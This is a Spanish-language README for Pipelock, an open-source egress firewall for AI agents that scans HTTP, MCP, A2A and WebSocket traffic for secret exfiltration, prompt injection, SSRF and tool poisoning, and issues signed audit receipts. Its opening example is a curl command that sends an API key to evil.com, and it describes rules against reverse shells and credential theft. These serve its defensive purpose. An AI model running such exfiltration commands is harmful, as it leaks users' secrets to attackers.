
Firewall de agente de IA de código abierto que escanea tráfico HTTP, MCP, A2A y WebSocket en busca de exfiltración, SSRF e inyección de prompts, emitiendo recibos de acción firmados verificables para auditoría.
Firewall de agente de IA de código abierto para Control de Egreso Verificable.
Pipelock se sitúa entre los agentes de IA y la red. Inspecciona el tráfico HTTP, WebSocket, MCP y A2A mediado, además del contenido de los túneles CONNECT cuando la interceptación TLS está activada, para detectar exfiltración de secretos, inyección de prompts, SSRF, envenenamiento de herramientas y cadenas de llamadas a herramientas riesgosas. El CONNECT simple sin interceptación se escanea a nivel de nombre de host y URL.
Pipelock emite action receipts firmados por el mediador sobre decisiones de límite conscientes del contenido, de modo que un revisor pueda verificar lo que Pipelock decidió fuera del runtime del agente. El corpus público agent-egress-bench ejercita las detecciones. Más información: Firewall de IA de código abierto.
Funciona con: Claude Code · OpenAI Codex · Cline · OpenCode · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph
Problema · Verificar · Inicio Rápido · Acción · Capturas · Características · Arquitectura · Docs · Playground · Blog · Preguntar a Dosu
Pruébalo en tu navegador en el playground en vivo. Si Pipelock se lo merece, dale una estrella al repositorio para que otras personas lo encuentren.
Tu agente de IA tiene $PROVIDER_API_KEY en su entorno, además de acceso a la shell. Una sola solicitud puede filtrarlo:```bash
curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching
Cada acción de máquina que realiza tu agente debería cruzar un límite entre tus secretos e internet abierto. Pipelock se convierte en ese límite cuando el agente se enruta a través de su proxy, envoltorio MCP, sandbox, modelo de contención de host o topología de despliegue en clúster. Escanea el tráfico de salida y entrada mediado, bloquea o marca ataques según el modo, y registra evidencia firmada de la decisión.
---
## Verifícalo Tú Mismo
La mayoría de las herramientas de seguridad de agentes te piden que confíes en su panel de control. Pipelock te entrega un recibo firmado y te permite verificarlo tú mismo, sin conexión, con una clave que tú posees. Sin cuenta ni servidor.
La demo integrada lanza escenarios de ataque reales, los bloquea y escribe recibos firmados junto con la clave pública en el disco sin configuración y sin red:```bash
pipelock demo --receipts-dir ./out # runs attack scenarios, writes 7 signed receipts + signer.pub
pipelock verify-receipt "$(ls ./out/*.json | head -1)" --key ./out/signer.pub # check a signature yourself (each receipt is <action-id>.json)
La tarjeta de puntuación califica cada afirmación por separado e indica lo que no prueba: si ocurrió algo fuera del límite que Pipelock media. Debajo, la línea de tiempo de recibos enumera las decisiones mediadas registradas con sus veredictos y enlaces hash. Un recibo que es honesto acerca de sus propios límites supera una marca de verificación verde que los oculta.
El visor de pruebas es gratuito y no necesita licencia:```bash pipelock evidence serve --receipt-dir ./out # read-only HTML report for one recorded session pipelock evidence view --receipt-dir ./out # static offline report, no server
Dos notas de honestidad, expresadas desde el principio. La demostración firma con una clave efímera que imprime para la ejecución, lo que prueba que los recibos son autoconsistentes en lugar de estar vinculados a una identidad nombrada. El patio de juegos público de Pipelock es una ruta separada que verifica contra una clave que Pipelock publica. Y el operador que ejecuta Pipelock posee la clave de firma, por lo que un recibo prueba lo que el límite decidió y que el titular de la clave lo firmó, no que el operador sea honesto. `pipelock anchor receipts` registra puntos de control de la cadena de recibos en un backend local o en un registro de transparencia de Rekor para una auditoría posterior, y la verificación independiente del operador contra ese ancla aún se está demostrando de extremo a extremo.
El argumento completo de por qué la prueba supera a las promesas está en [demostración sobre atestación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security/demonstration-over-attestation.md).
---
## Inicio rápido```bash
# Install from source (Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
# Set up local agent integrations and generate a config
pipelock init
# Test the scanner
pipelock check --url "https://evil.com/?k=AKIAIOSFODNN7EXAMPLE" # blocked: AWS Access ID
pipelock check --url "https://docs.python.org/3/" # allowed
docker pull ghcr.io/luckypipewrench/pipelock:latest
brew install luckyPipewrench/tap/pipelock
</details>
<details>
<summary>Verificar la integridad de la publicación</summary>```bash
gh attestation verify pipelock_3.2.0_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:v3.2.0 --owner luckyPipewrench
Los flujos de trabajo de lanzamiento publican procedencia SLSA, SBOM CycloneDX, sumas de verificación e imágenes de contenedor firmadas. Las compilaciones desde el código fuente con go install producen un binario solo para la comunidad; los artefactos de lanzamiento precompilados incluyen código de nivel de pago que se activa con una clave de licencia válida.
El panel de operador Pro/Empresarial (pipelock dashboard serve) es una consola de solo lectura sobre evidencia firmada. Admite autenticación mediante token, OIDC o mTLS; permisos RBAC acotados; vistas de metadatos censurados; elevación a vista sin procesar; registros del ciclo de vida de exenciones; copia de seguridad y restauración; certificados de cobertura; y vistas de flota. Está presente en compilaciones etiquetadas como empresariales y en artefactos de lanzamiento con la característica de licencia requerida.
El visor de evidencia gratuito de una sola sesión que se muestra arriba es independiente. No necesita licencia y no tiene enumeración entre agentes.
pipelock report --input events.jsonl genera informes HTML, JSON o en paquete firmado con clasificación de riesgo, línea de tiempo, categorías de eventos y un apéndice de evidencia. La ruta gratuita de Prometheus y Grafana monitorea una instancia de Pipelock y es distinta del plano de control de flota de Enterprise Conductor.
agent-egress-bench ejecuta un corpus de ataques de exfiltración de agentes e inyección de indicaciones contra Pipelock, o contra cualquier otra herramienta. Los números provienen de una ejecución que cualquiera puede repetir, no de una afirmación.
Pipelock se ejecuta en tres modos:
Para agentes que ejecutan modelos sin censura o ablacionados, el ajuste preestablecido hostile-model superpone defensas sobre el modo estricto: umbrales de entropía agresivos, bloqueo general de herramientas de red, vinculación de sesión, detección de exfiltración entre solicitudes y un interruptor de apagado preconfigurado. pipelock audit recomienda este ajuste preestablecido cuando detecta cadenas de herramientas de eliminación de barreras conocidas a través de señales de dependencias.
Evaluación honesta: El modo estricto bloquea el HTTP saliente que atraviesa Pipelock excepto los dominios de API en la lista permitida, por lo que no hay canal de exfiltración a través del proxy en sí. El modo equilibrado eleva el listón de "un comando curl" a "ataque sofisticado preplanificado". El modo auditoría le brinda visibilidad que no tiene hoy. Con el sandbox habilitado (
pipelock sandbox) o la topología de contención de host/clúster aplicada, Pipelock agrega un límite de SO o de implementación sobre la inspección de contenido. El egreso directo aún debe ser bloqueado por ese límite para herramientas no cooperativas que ignoran la configuración del proxy.
Matriz de referencia: docs/comparison.md
Centro de comparación canónico: Comparación de seguridad en tiempo de ejecución de IA
Pipelock es un proxy de egreso de IA y un control de seguridad MCP. Se sitúa en línea entre su agente de IA y la red, escanea el tráfico saliente y entrante, y emite recibos firmados junto con metadatos de mediación para la atestación fuera del tiempo de ejecución del agente. La evaluación de la identidad de carga de trabajo AARP/SVID está hoy del lado del verificador: el proxy y los tiempos de ejecución MCP no consumen evidencia SVID en decisiones de permitir/denegar en vivo ni vinculan la identidad del actor del recibo a partir de un X.509-SVID.
block, strip, warn o ask.text/event-stream de las puertas de enlace LLM y el flujo MCP HTTP/SSE se procesan token por token con DLP por evento y entre eventos rodantes y escaneo de inyección. Una detección termina el flujo en modo fallo-cerrado. Consulte la guía de streaming SSE.Pipelock envuelve servidores MCP con escaneo bidireccional:```bash
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp
pipelock mcp proxy --upstream http://localhost:8080/mcp
pipelock run --config pipelock.yaml --mcp-listen 127.0.0.1:8889 --mcp-upstream http://localhost:3000/mcp
- **Escaneo de entrada:** las solicitudes del cliente MCP se verifican en busca de fugas DLP e inyección en argumentos de herramientas.
- **Escaneo de respuesta:** las respuestas del servidor se escanean antes de que el agente las vea.
- **Envenenamiento de herramientas:** las descripciones de `tools/list` se verifican en busca de instrucciones ocultas y cambios de "rug-pull" durante la sesión.
- **Política de herramientas:** 17 reglas integradas bloquean eliminaciones destructivas de archivos, acceso a credenciales, shells inversas, mecanismos de persistencia, ejecución de comandos codificados y llamadas a herramientas de alto riesgo relacionadas antes de la ejecución.
- **Cadenas de llamadas a herramientas:** 10 patrones de categoría-eje integrados detectan cadenas de reconocimiento, robo de credenciales, preparación de datos, persistencia, exfiltración y callback con tolerancia de brecha configurable.
- **Inspección A2A:** el tráfico del protocolo Agente-a-Agente de Google se inspecciona en las rutas directas y MCP; Pipelock no es un proxy A2A independiente.
- **Listeners HTTP MCP autenticados (v3.2.0):** los listeners MCP que no son de loopback fallan en modo cerrado por defecto y requieren `--mcp-auth-token-file`, o un `--mcp-allow-unauthenticated` explícito para despliegues aislados por política de red. Los listeners de loopback sin token rechazan autoridades de host de rebote DNS y puerto incorrecto, y eliminan las credenciales del listener de los encabezados.
### Contención
La contención de procesos sin privilegios utiliza primitivas nativas del SO. Linux usa Landlock, seccomp y espacios de nombres de red. macOS usa perfiles `sandbox-exec`. En contenedores, `--best-effort` mantiene Landlock y seccomp cuando la creación de espacios de nombres está restringida, mientras que el escaneo de red utiliza enrutamiento basado en proxy.```bash
pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server
La contención del host va más allá en Linux:```bash pipelock contain install pipelock contain verify pipelock contain run -- claude-code
`pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` gestiona un modelo de operador / proxy / agente de 3 UID con enrutamiento de coincidencia de propietario de nftables, configuración de servicios systemd, comandos envoltorio, ACLs de espacios de trabajo, actualización de CA y evidencia de postura. Consulte [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md).
### Evidencia y Recibos
- **Grabador de vuelo:** registro de evidencia JSONL encadenado por hash con puntos de control firmados con Ed25519 y redacción DLP. `pipelock init` provisiona un directorio de grabador y clave de firma para instalaciones estándar, mientras que el grabador permanece inactivo hasta que existan un directorio y una clave. Consulte [Grabador de vuelo](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/flight-recorder.md).
- **Recibos de acción:** registros firmados emitidos para acciones mediadas, que contienen veredicto, hash de política, transporte y capa de escáner. Los bloques producen recibos; la aplicación de recibos de ruta permitida requiere `flight_recorder.require_receipts`. Verifique con `pipelock verify-receipt --key <signer.pub>`. Las ejecuciones no fijadas son solo estructurales y salen con código distinto de cero a menos que se pase `--allow-unpinned`.
- **Envolvente de mediación:** metadatos de banda lateral RFC 8941 en solicitudes HTTP reenviadas y `_meta` de MCP, con tipo de acción, veredicto, identidad del actor, hash de política, contexto de contaminación e ID de correlación de recibo. Consulte [guía de federación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md).
- **Conformidad de recibos:** cuatro implementaciones independientes de verificador en varios lenguajes (Go, TypeScript, Rust y Python) se ejecutan contra un [corpus de conformidad](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/conformance/) compartido, incluyendo entradas malformadas y falsificables como claves duplicadas, desbordamiento de enteros y sustitutos no emparejados. Una superficie wasm de navegador reutiliza la implementación del verificador Go. La evaluación AARP/SVID sigue siendo un perfil de verificador fuera de línea, no una aplicación de identidad en tiempo de ejecución.
- **Anclajes:** `pipelock anchor receipts` registra puntos de control de la cadena de recibos en un backend local o Rekor. El anclaje en Rekor es material de prueba para auditorías posteriores; la verificación en Rekor requiere claves de registro fijadas y la ruta de independencia del operador de extremo a extremo aún está en proceso de demostración.
- **Cápsula de postura:** `pipelock posture emit` y `pipelock posture verify` producen y verifican una instantánea firmada de la postura de aplicación de un despliegue, con una puerta de CI y un modelo de puntuación, para que un revisor pueda confirmar que el límite estaba configurado como afirma.
### Flota y Empresa
- **Panel de control del operador:** `pipelock dashboard serve` es una consola de solo lectura sobre evidencia firmada. Pro desbloquea las vistas General, Evidencia, Exenciones, Agentes, Presupuestos y Confianza y Claves; Enterprise añade las vistas Flota, Banco de trabajo e Incidentes. Consulte [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md).
- **Visor de evidencia gratuito:** `pipelock evidence serve` y `pipelock evidence view` representan una sesión de grabador seleccionada sin licencia ni enumeración de agentes cruzados. `pipelock evidence verify-cert` verifica certificados de cobertura emitidos por Pro fuera de línea.
- **Conductor:** Plano de control de flota empresarial para distribución de paquetes de políticas firmados, sumidero de evidencia firmada (`pipelock fleet-sink`), inscripción, eliminación remota, reversión, ejecución en seco, reproducción de decisiones y verificación previa de desviación en tiempo de ejecución/estado aplicado a través de mTLS/SPIFFE. Los seguidores aplican localmente; el modo de política obsoleta predeterminado activa una fuente de denegación independiente después de su ventana de gracia, mientras que la anulación documentada `continue_last_known_good` debilita esa postura. Conductor no guarda secretos de agentes. Consulte la [guía de Conductor](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md).
- **Retención legal:** `pipelock dashboard legal-hold add/list/release` gestiona las retenciones de preservación como metadatos de cumplimiento mantenidos fuera de la autoridad HTTP del panel, por lo que un panel comprometido puede leer las retenciones pero nunca falsificarlas ni eliminarlas.
- **Línea base de comportamiento:** perfilado y bloqueo para el comportamiento de herramientas MCP con `pipelock baseline list/show/ratify/forget` para aprobación del operador y reaprendizaje. Consulte [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md).
### Operatividad
- **Interruptor de apagado:** seis fuentes de activación independientes: archivo de configuración, API remota, SIGUSR1, archivo centinela, eliminación remota de Conductor y detección de paquete obsoleto. Cualquier fuente activa bloquea el tráfico, con exenciones de punto final e IP en el controlador.
- **API de escaneo:** escaneo programático para veredictos de `url`, `dlp`, `prompt_injection` y `tool_call` con autenticación de token de portador, limitación de velocidad por token, hallazgos estructurados y métricas de Prometheus. Consulte [docs/scan-api.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/scan-api.md).
- **Centinela del sistema de archivos:** monitorea los directorios de trabajo del agente en busca de secretos escritos en disco y atribuye las escrituras al linaje de subprocesos MCP en Linux. Consulte [docs/guides/filesystem-sentinel.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/filesystem-sentinel.md).
- **Emisión de eventos:** reenvía eventos de auditoría a SIEMs, receptores webhook, syslog, CEF, OTLP y salidas de métricas sin bloquear la ruta activa del proxy. Consulte [docs/guides/siem-integration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/siem-integration.md).
- **Evaluación de seguridad:** `pipelock assess init`, `pipelock assess run` y `pipelock assess finalize` orquestan simulación de ataques, puntuación de configuración, verificación de instalación y descubrimiento MCP en un paquete de evidencia reproducible. Las exposiciones críticas, como servidores MCP desprotegidos, limitan la calificación independientemente de la puntuación numérica. El resumen gratuito muestra su calificación, puntuaciones de sección y principales hallazgos; una licencia desbloquea el informe completo con hallazgos específicos del servidor, comandos de remediación y evidencia firmada con Ed25519.
<details>
<summary>Más características</summary>
| Característica | Qué Hace |
|---------|-------------|
| **Informes de auditoría** | `pipelock report --input events.jsonl` genera informes HTML/JSON/paquete con calificación de riesgo, cronología y apéndice de evidencia. Firma Ed25519 con `--sign`. ([Informe de muestra](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/sample-report.html)) |
| **Diagnóstico** | `pipelock diagnose` ejecuta 7 comprobaciones locales para verificar su configuración de extremo a extremo sin red. |
| **Doctor de aplicación** (v2.5) | `pipelock doctor` informa el estado configurado vs. aplicable para proxy, intercepción TLS, escaneo del cuerpo de la solicitud, Browser Shield, envoltura MCP, integridad binaria MCP, procedencia de herramientas, file_sentry, Sentry y señales de límite de despliegue. |
| **Bloqueo de inyección en cuerpo de solicitud** (v2.5) | Los hallazgos de inyección de solicitud en el cuerpo y DLP crítico bloquean destinos no proveedores en modo de aplicación a través de transportes forward, reverse, TLS-intercept y WebSocket, con encabezados de razón de bloqueo para diagnóstico visible para el operador. |
| **Política de solicitud** (v2.6) | Rieles de denegación/advertencia predeterminados sobre operaciones de API salientes: coincidencia de ruta más predicados de operación GraphQL, recurre en envolventes JSON `$batch`, falla cerrado en cuerpos no analizables u opacos, y se ejecuta antes de la puerta del contrato. Consulte la [guía de política de solicitud](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/request-policy.md). |
| **Intercepción TLS** | MITM de túnel CONNECT opcional: descifra, escanea cuerpos/encabezados/respuestas, vuelve a cifrar. `pipelock tls init` genera una CA, luego `pipelock tls install-ca` imprime los pasos de instalación del almacén de confianza de la plataforma. |
| **Pistas de bloqueo** | `explain_blocks: true` opcional añade sugerencias de corrección a las respuestas bloqueadas. |
| **Auditoría de proyecto** | `pipelock audit ./project` escanea en busca de riesgos de seguridad y genera una configuración personalizada. |
| **Puntuación de configuración** (v2.6) | `pipelock audit score --config pipelock.yaml` evalúa la postura de seguridad en 23 categorías con un presupuesto de 170 puntos y una calificación con letra. |
| **Integridad de archivos** | Los manifiestos SHA256 detectan archivos modificados, añadidos o eliminados en el espacio de trabajo. |
| **Protección Git** | `git diff \| pipelock git scan-diff` detecta secretos antes del commit. |
| **Firma Ed25519** | Gestión de claves, firma de archivos y verificación de firmas para confianza multiagente. |
| **Perfilado de sesiones** | Análisis de comportamiento por sesión para ráfagas de dominio y picos de volumen. |
| **Aplicación adaptativa** | Puntuación de amenaza por sesión con escalada de advertencia a bloqueo, temporizadores de desescalada y detección de ráfagas de dominio. |
| **CLI de operador adaptativo** (v2.5) | `pipelock adaptive status / flush / whoami` expone el estado adaptativo en tiempo de ejecución a través de la API de administración autenticada. Consulte [`docs/cli/adaptive.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/adaptive.md). |
| **Supresión de hallazgos** | Silenciar falsos positivos conocidos a través de reglas de configuración o comentarios inline `pipelock:ignore`. |
| **Soporte multiagente** | Identificación de agente a través del encabezado `X-Pipelock-Agent` para filtrado por agente. |
| **Monitoreo de flota** | Métricas de Prometheus por instancia más [panel de Grafana](https://github.com/luckypipewrench/pipelock/blob/HEAD/configs/grafana-dashboard.json) listo para importar. Monitoreo gratuito de instancia única, distinto de Conductor. |
| **Panel de operador** (v3.1, Pro/Enterprise) | `pipelock dashboard serve` proporciona vistas de solo lectura de General, Evidencia, Exenciones, Agentes, Presupuestos, Confianza y Claves, Flota, Banco de trabajo e Incidentes con autenticación por token, OIDC o mTLS, RBAC acotado, elevación de vista sin procesar, copia de seguridad/restauración, registros de ciclo de vida de exenciones y certificados de cobertura. Consulte [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md). |
| **Visor de evidencia gratuito** (v3.1) | `pipelock evidence serve` sirve una sesión de grabador seleccionada como informe HTML de solo lectura sin licencia y sin enumeración de agentes cruzados. `pipelock evidence verify-cert` verifica certificados de cobertura emitidos por Pro fuera de línea. |
| **Conductor: plano de control de flota** (v2.7, Enterprise) | Distribución de paquetes de políticas firmados, sumidero de auditoría de evidencia firmada (`pipelock fleet-sink`), inscripción, eliminación remota, reversión de políticas, ejecución en seco, reproducción de decisiones y verificación previa de desviación en tiempo de ejecución/estado aplicado a través de mTLS/SPIFFE. Controlado por la característica de licencia `fleet`; el comportamiento de política obsoleta es explícito y predetermina a denegación estricta. Consulte la [guía de Conductor](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md). |
| **Escaneo A2A** | Detección de envenenamiento de tarjeta de agente, monitoreo de desviación de tarjeta y prevención de contrabando de sesiones para el protocolo Agente a Agente de Google en rutas forward/MCP. |
| **Línea base de comportamiento** | Perfilado y bloqueo para el comportamiento de herramientas MCP con `pipelock baseline list/show/ratify/forget` para aprobación del operador y reaprendizaje. Consulte [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md). |
| **Denegación de billetera** | Presupuestos MCP por agente para total de llamadas a herramientas, reintentos de la misma herramienta, detección de bucles/ciclos y duración de tiempo real. |
| **Escalada de contaminación** | Escalada de políticas basada en exposición a través de límites MCP y de tarea hasta que se restablezca la confianza. |
| **Envolvente de mediación** | Metadatos de banda lateral RFC 8941 en solicitudes HTTP reenviadas y `_meta` de MCP, con verificación entrante, protección de reproducción, formato de actor SPIFFE y un directorio de claves de firma RFC 9421. Consulte [guía de federación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md). |
| **Conformidad de recibos** | Suite de verificación de recibos entre implementaciones (`sdk/conformance/`) a través de implementaciones independientes en Go, TypeScript, Rust y Python, más una superficie wasm de navegador respaldada por Go. `EvidenceReceipt v2` usa canonicación RFC 8785/JCS. La evaluación AARP/SVID sigue siendo del lado del verificador fuera de línea. |
| **Aprender y bloquear** (v2.4) | Contratos de comportamiento por agente: observar tráfico, compilar un contrato candidato firmado, reproducir observaciones capturadas en sombra, ratificar por regla, promover el manifiesto activo firmado y aplicar en vivo en transportes que usan URL más llamadas a herramientas MCP. Consulte [guía de aprender y bloquear](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/learn-and-lock.md). |
| **Encabezado de razón de bloqueo** (v2.4) | `X-Pipelock-Block-Reason` en rutas de bloqueo compatibles con HTTP, con el mismo vocabulario de motivo en metadatos de error JSON-RPC de MCP. Consulte [encabezado de razón de bloqueo](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/block-reason-header.md). |
| **Perro guardián de detección de cuña** (v2.4) | `health_watchdog` devuelve `/health` 503 cuando un latido de subsistema se vuelve obsoleto. Consulte [guía de punto final de salud](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/health.md). |
| **Forma de complemento de proveedor de redacción** (v2.4) | Analizadores de redacción de primera parte para APIs de chat de Anthropic, OpenAI y Gemini, con una forma de complemento de proveedor para analizadores de terceros. |
| **Esquema de paquete de auditoría v0 + verificadores** (v2.5) | Esquema canónico de paquete de auditoría de primera parte con implementaciones de verificador en Go, TypeScript y Rust, más CLI independiente [`pipelock-verifier`](https://github.com/luckypipewrench/pipelock/blob/HEAD/cmd/pipelock-verifier/). El esquema reside en [`sdk/audit-packet/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/audit-packet/); los paquetes de verificador residen en [`sdk/verifiers/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/verifiers/). |
| **Ciclo de vida de contención de host** (v2.5) | `pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` gestiona el modelo de contención de 3 UID. Consulte [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md). |
| **Manifiestos de integridad MCP** (v2.5) | `pipelock mcp integrity manifest generate / verify / sign / verify-signature` fija binarios/scripts de servidor MCP por hash y puede requerir una firma de manifiesto de confianza antes del lanzamiento del subproceso. Consulte [`docs/cli/mcp-integrity.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/mcp-integrity.md). |
| **Contrato de lanzador MCP de Kubernetes** (v2.5) | `pipelock init sidecar --mcp-upstream` emite configuración de oyente acompañante, puerto de servicio, anotaciones de carga de trabajo, permiso de NetworkPolicy, `PIPELOCK_MCP_PROXY_URL` y `PIPELOCK_MCP_CONFIG` montado. Consulte [`docs/cli/init-sidecar.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/init-sidecar.md). |
| **Modo estricto de federación** (v2.5) | La verificación entrante de envolvente de mediación requiere actores en formato SPIFFE por defecto, se aplican lápidas de contrato, y `pipelock envelope trust add/list/remove/verify` gestiona la confianza local. Consulte [guía de federación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md). |
| **Política de medios** | Elimina metadatos esteganográficos de JPEG/PNG, rechaza audio/video por defecto, endurece contenido activo SVG y aplica límites de tamaño de imagen. Consulte [Política de medios](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/media-policy.md). |
| **Mapeos de cumplimiento** | OWASP MCP Top 10, OWASP Agentic Top 15, OWASP LLM Top 10, NIST 800-53, EU AI Act, y mapeos de adquisición/auditoría. |
</details>
---
## Gratuito, Pro y Enterprise
Toda la detección, aplicación, contención y evidencia de agente único es gratuita para siempre bajo Apache 2.0. Los niveles pagados añaden coordinación multiagente (Pro) y gobierno de flota más cumplimiento (Enterprise).
| Capacidad | Gratuito | Pro | Enterprise |
|---|:--:|:--:|:--:|
| Escaneo y detección (tubería de URL ordenada, DLP, inyección, SSRF, SSE en streaming, redacción, protección de direcciones) | Sí | Sí | Sí |
| Escaneo MCP y A2A (entrada, respuesta, política de herramientas, cadena de herramientas, envenenamiento, integridad, oyentes autenticados) | Sí | Sí | Sí |
| Contención, sandbox, `contain` de host, interruptor de apagado de 6 fuentes | Sí | Sí | Sí |
| Recibos de acción, grabador de vuelo, anclajes, visor de evidencia gratuito, `verify-cert`, verificador independiente | Sí | Sí | Sí |
| Tokens canarios, skill-scan, `explain`, Prometheus y Grafana de instancia única | Sí | Sí | Sí |
| Perfiles por agente: identidad, presupuestos, aislamiento de configuración y escáner, sandbox por agente | No | Sí | Sí |
| Enrutamiento por agente por CIDR de origen y selector de red | No | Sí | Sí |
| Panel de operador: General, Evidencia, Exenciones, Agentes, Presupuestos, Confianza y Claves | No | Sí | Sí |
| Certificados de cobertura por agente | No | Sí | Sí |
| Retención legal y metadatos de cumplimiento | No | Sí | Sí |
| Plano de control de flota Conductor, sumidero de auditoría `fleet-sink`, eliminación remota, reversión, reproducción de decisiones, verificación previa de desviación | No | No | Sí |
| Inscripción de seguidores mTLS y distribución de políticas firmadas verificadas por lista | No | No | Sí |
| Vistas de flota del panel: Flota, Banco de trabajo, Incidente | No | No | Sí |
El informe firmado de `pipelock assess` es un derecho `assess` separado, independiente de Pro y Enterprise. La calificación gratuita de assess no cambia.
---
## Cómo Funciona
Pipelock utiliza **separación de capacidades**: en un despliegue con aplicación, el proceso agente tiene secretos pero no acceso directo a la red. Pipelock tiene acceso a la red pero no secretos de agente. Incluso si el agente recibe una inyección de mensaje, no puede alcanzar los controles del cortafuegos.
Tres modos de proxy HTTP (mismo puerto), más un proxy MCP dedicado e inspección A2A en las rutas forward y MCP:
- **Proxy de recuperación** (`/fetch?url=...`): Recupera la URL, extrae texto, escanea en busca de inyección, devuelve contenido limpio.
- **Proxy forward** (`HTTPS_PROXY`): Túnel HTTP CONNECT estándar sin cambios en el código de la aplicación. Aún se requiere configuración del proxy. La intercepción TLS opcional permite el escaneo de la carga útil.
- **Proxy WebSocket** (`/ws?url=ws://...`): Escaneo bidireccional de tramas con detección DLP + inyección.
- **Proxy MCP** (`pipelock mcp proxy`): Envuelve servidores MCP stdio o HTTP con escaneo bidireccional.
- **Inspección A2A**: Inspecciona el tráfico del protocolo Agente a Agente de Google a medida que cruza las rutas forward y MCP.

<details>
<summary>Diagrama de texto (para terminales)</summary>```
┌──────────────────────────────────────────────────────────┐
│ PRIVILEGED ZONE │
│ │
│ AI Agent │
│ - API keys, credentials, private code and context │
│ - Network-isolated by deployment │
└────────────────────────────┬─────────────────────────────┘
│ mediated request
│ fetch / CONNECT / WS / MCP / A2A
▼
┌──────────────────────────────────────────────────────────┐
│ FIREWALL ZONE │
│ │
│ Pipelock Agent Firewall │
│ - Destination: URL, SSRF, and DNS checks │
│ - Data: DLP, secret detection, and budgets │
│ - Content: prompt injection and tool poisoning │
│ - Policy: allow, block, or redact │
│ - No agent secrets │
└────────────────────────────┬─────────────────────────────┘
│ approved request
▼
┌──────────────────────────────────────────────────────────┐
│ INTERNET │
│ │
│ Web APIs, websites, MCP servers, tools, and A2A services │
└──────────────────────────────────────────────────────────┘
Internet -- response --> Pipelock -- scanned content --> AI Agent
Genera una configuración desde un preset incorporado, o deja que pipelock audit adapte una a tu proyecto:```bash
pipelock presets
pipelock generate config --list
pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my-project -o pipelock.yaml
| Preajuste CLI | Modo | Acción | Ideal para |
|------------|------|--------|----------|
| `balanced` | balanced | warn | Propósito general (por defecto) |
| `strict` | strict | block | Alta seguridad, industrias reguladas |
| `audit` | audit | warn | Evaluación solo de registro |
| `claude-code` | balanced | block | Claude Code sin supervisión |
| `cursor` | balanced | block | IDE Cursor |
| `generic-agent` | balanced | warn | Nuevos agentes durante el ajuste |
| `hostile-model` | strict | block | Modelos sin censura/abliterados |
Los cambios de configuración se detectan mediante el vigilante de archivos o SIGHUP. Referencia completa: **[docs/configuration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/configuration.md)**
Para el ajuste de falsos positivos: **[docs/false-positive-tuning.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/false-positive-tuning.md)**
---
## Guías de Integración
- **[Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md):** Configuración del proxy MCP, configuración de `.claude.json`
- **[OpenAI Codex](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/codex.md):** Envoltura del proxy MCP, proxy directo, integración con sandbox
- **[Cline](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/cline.md):** Envoltura del proxy MCP para el `mcp.json` de Cline
- **[OpenCode](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/opencode.md):** Envoltura del proxy MCP para servidores MCP locales y remotos de OpenCode
- **[Zed](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/zed.md):** Envoltura del proxy MCP para el bloque `context_servers` de Zed en `settings.json`
- **[OpenAI Agents SDK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openai-agents.md):** `MCPServerStdio`, traspasos multiagente
- **[Google ADK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/google-adk.md):** `McpToolset`, `StdioConnectionParams`
- **[AutoGen](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/autogen.md):** `StdioServerParams`, `mcp_server_tools()`
- **[CrewAI](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/crewai.md):** Envoltura de `MCPServerStdio`, `MCPServerAdapter`
